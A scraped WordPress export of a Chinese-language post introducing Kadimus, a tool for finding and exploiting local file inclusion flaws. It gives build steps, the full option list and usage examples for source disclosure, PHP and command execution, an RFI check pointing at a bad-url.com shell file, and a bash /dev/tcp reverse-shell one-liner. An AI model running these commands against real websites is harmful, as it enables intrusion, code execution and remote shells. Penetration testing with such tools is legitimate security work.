Kadimus\u662f\u4e00\u4e2a\u7528\u4e8e\u68c0\u6d4b\u7f51\u7ad9\u672c\u5730\u6587\u4ef6\u5305\u542b(LFI)\u6f0f\u6d1e\u7684\u5b89\u5168\u5de5\u5177\u3002<\/p>\n
[[131145]]<\/span><\/p>\n \u7279\u6027<\/strong><\/p>\n \u7f16\u8bd1<\/strong><\/p>\n \u5b89\u88c5libcurl:<\/p>\n CentOS\/Fedora<\/p>\n \u5b89\u88c5libpcre:<\/strong><\/p>\n CentOS\/Fedora<\/p>\n <\/p>\n Debian based<\/p>\n <\/p>\n \u5b89\u88c5libssh:<\/strong><\/p>\n CentOS\/Fedora<\/p>\n <\/p>\n \u57fa\u4e8eDebian<\/p>\n <\/p>\n ***\u6267\u884c<\/strong><\/p>\n <\/p>\n \u9009\u9879<\/strong><\/p>\n <\/p>\n \u6d4b\u8bd5\u793a\u4f8b<\/strong><\/p>\n \u626b\u63cf:<\/p>\n <\/p>\n \u83b7\u53d6\u6587\u4ef6\u6e90\u7801:<\/p>\n <\/p>\n \u6267\u884cphp\u4ee3\u7801:<\/p>\n <\/p>\n \u547d\u4ee4\u6267\u884c:<\/p>\n <\/p>\n \u68c0\u67e5\u8fdc\u7a0b\u6587\u4ef6\u5305\u542b(RFI)\u6f0f\u6d1e:<\/p>\n <\/p>\n \u53cd\u5f39shell:<\/p>\n <\/p>\n","protected":false},"excerpt":{"rendered":" Kadimus\u662f\u4e00\u4e2a\u7528\u4e8e\u68c0\u6d4b\u7f51\u7ad9\u672c\u5730\u6587\u4ef6\u5305\u542b(LFI)\u6f0f\u6d1e\u7684\u5b89\u5168\u5de5\u5177\u3002 [[131145]] \u7279\u6027 \u68c0\u6d4b\u6240\u6709U […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[202645],"tags":[],"class_list":["post-291780","post","type-post","status-publish","format-standard","hentry","category-202645"],"_links":{"self":[{"href":"https:\/\/idc.net\/help\/wp-json\/wp\/v2\/posts\/291780","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/idc.net\/help\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/idc.net\/help\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/idc.net\/help\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/idc.net\/help\/wp-json\/wp\/v2\/comments?post=291780"}],"version-history":[{"count":0,"href":"https:\/\/idc.net\/help\/wp-json\/wp\/v2\/posts\/291780\/revisions"}],"wp:attachment":[{"href":"https:\/\/idc.net\/help\/wp-json\/wp\/v2\/media?parent=291780"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/idc.net\/help\/wp-json\/wp\/v2\/categories?post=291780"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/idc.net\/help\/wp-json\/wp\/v2\/tags?post=291780"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}\r\n\u68c0\u6d4b\u6240\u6709URL\u53c2\u6570\r\n\/var\/log\/auth.log RCE\r\n\/proc\/self\/environ RCE\r\nphp:\/\/input RCE\r\ndata:\/\/text RCE\r\n\u6e90\u4ee3\u7801\u6cc4\u9732\u68c0\u6d4b\r\n\u591a\u7ebf\u7a0b\u626b\u63cf\r\nHTTP\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\r\n\u4ee3\u7406\u652f\u6301 (socks4:\/\/, socks4a:\/\/, socks5:\/\/ ,socks5h:\/\/ and http:\/\/)<\/pre>\n
\r\n# yum install libcurl-devel\r\nDebian based\r\n# apt-get install libcurl4-openssl-dev<\/pre>\n
\r\n# yum install libpcre-devel<\/pre>\n
\r\n# apt-get install libpcre3-dev<\/pre>\n
\r\n# yum install libssh-devel<\/pre>\n
\r\n# apt-get install libssh-dev<\/pre>\n
\r\n$ git clone https:\/\/github.com\/P0cL4bs\/Kadimus.git\r\n$ cd Kadimus\r\n$ make<\/pre>\n
\r\n-h, --help Display this help menu\r\n Request:\r\n -B, --cookie STRING Set custom HTTP Cookie header\r\n -A, --user-agent STRING User-Agent to send to server\r\n --connect-timeout SECONDS Maximum time allowed for connection\r\n --retry-times NUMBER number of times to retry if connection fails\r\n --proxy STRING Proxy to connect, syntax: protocol:\/\/hostname:port\r\n Scanner:\r\n -u, --url STRING Single URI to scan\r\n -U, --url-list FILE File contains URIs to scan\r\n -o, --output FILE File to save output results\r\n --threads NUMBER Number of threads (2..1000)\r\n Explotation:\r\n -t, --target STRING Vulnerable Target to exploit\r\n --injec-at STRING Parameter name to inject exploit\r\n (only need with RCE data and source disclosure)\r\n RCE:\r\n -X, --rce-technique=TECH LFI to RCE technique to use\r\n -C, --code STRING Custom PHP code to execute, with php brackets\r\n -c, --cmd STRING Execute system command on vulnerable target system\r\n -s, --shell Simple command shell interface through HTTP Request\r\n -r, --reverse-shell Try spawn a reverse shell connection.\r\n -l, --listen NUMBER port to listen\r\n -b, --bind-shell Try connect to a bind-shell\r\n -i, --connect-to STRING Ip\/Hostname to connect\r\n -p, --port NUMBER Port number to connect\r\n --ssh-port NUMBER Set the SSH Port to try inject command (Default: 22)\r\n --ssh-target STRING Set the SSH Host\r\n RCE Available techniques\r\n environ Try run PHP Code using \/proc\/self\/environ\r\n input Try run PHP Code using php:\/\/input\r\n auth Try run PHP Code using \/var\/log\/auth.log\r\n data Try run PHP Code using data:\/\/text\r\n Source Disclosure:\r\n -G, --get-source Try get the source files using filter:\/\/\r\n -f, --filename STRING Set filename to grab source [REQUIRED]\r\n -O FILE Set output file (Default: stdout)<\/pre>\n
\r\n.\/kadimus -u localhost\/?pg=contact -A my_user_agent\r\n.\/kadimus -U url_list.txt --threads 10 --connect-timeout 10 --retry-times 0<\/pre>\n
\r\n.\/kadimus -t localhost\/?pg=contact -G -f \"index.php\" -O local_output.php --inject-at pg<\/pre>\n
\r\n.\/kadimus -t localhost\/?pg=php:\/\/input -C '' -X input<\/pre>\n
\r\n.\/kadimus -t localhost\/?pg=\/var\/log\/auth.log -X auth -c 'ls -lah' --ssh-target localhost<\/pre>\n
\r\n\/* http:\/\/bad-url.com\/shell.txt *\/ <\/pre>\n
\r\n.\/kadimus -t localhost\/?pg=contact.php -Xdata --inject-at pg -r -l 12345 -c 'bash -i >& \/dev\/tcp\/127.0.0.1\/12345 0>&1' --retry-times 0<\/pre>\n